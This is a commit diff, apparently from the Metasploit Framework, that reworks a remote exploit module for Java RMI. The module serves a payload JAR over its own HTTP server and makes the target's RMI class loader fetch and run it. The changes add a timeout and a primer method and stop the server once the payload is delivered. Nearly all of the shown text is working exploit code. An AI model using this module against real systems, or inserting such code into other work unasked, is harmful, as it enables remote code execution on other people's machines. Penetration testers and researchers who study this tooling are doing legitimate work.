Use primer
jvazquez-r7
parent
0bcb99c47d
commit
73ce4cbeaa
|
|
@ -8,8 +8,8 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -41,6 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Privileged' => false,
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'WfsDelay' => 10
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Generic (Java Payload)',
|
||||
|
|
@ -76,14 +80,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
register_options( [ Opt::RPORT(1099) ], self.class)
|
||||
register_options([
|
||||
Opt::RPORT(1099),
|
||||
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
|
||||
], self.class)
|
||||
|
||||
register_autofilter_ports([ 1098, 1099 ])
|
||||
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
|
||||
end
|
||||
|
||||
def exploit
|
||||
start_service()
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
||||
rescue Timeout::Error
|
||||
# When the server stops due to our timeout, fail and
|
||||
# don't wait WfsDelay
|
||||
fail_with(Failure::Unknown, "The HTTP Server didn't get a payload requests")
|
||||
end
|
||||
end
|
||||
|
||||
def primer
|
||||
connect
|
||||
|
||||
jar = rand_text_alpha(rand(8)+1) + '.jar'
|
||||
|
|
@ -106,11 +122,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
buf = ""
|
||||
1.upto(6) do
|
||||
res = sock.get_once(-1, 5) rescue nil
|
||||
break if not res
|
||||
break unless res
|
||||
break if session_created?
|
||||
buf << res
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
if buf =~ /RMI class loader disabled/
|
||||
fail_with(Failure::NotVulnerable, "The RMI class loader is disabled")
|
||||
end
|
||||
|
|
@ -120,14 +138,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
print_good("Target #{rhost}:#{rport} may be exploitable...")
|
||||
|
||||
# Wait for the request to be handled
|
||||
1.upto(120) do
|
||||
break if session_created?
|
||||
select(nil, nil, nil, 0.25)
|
||||
handler()
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
|
@ -148,6 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
|
||||
print_status("Replied to request for payload JAR")
|
||||
stop_service
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue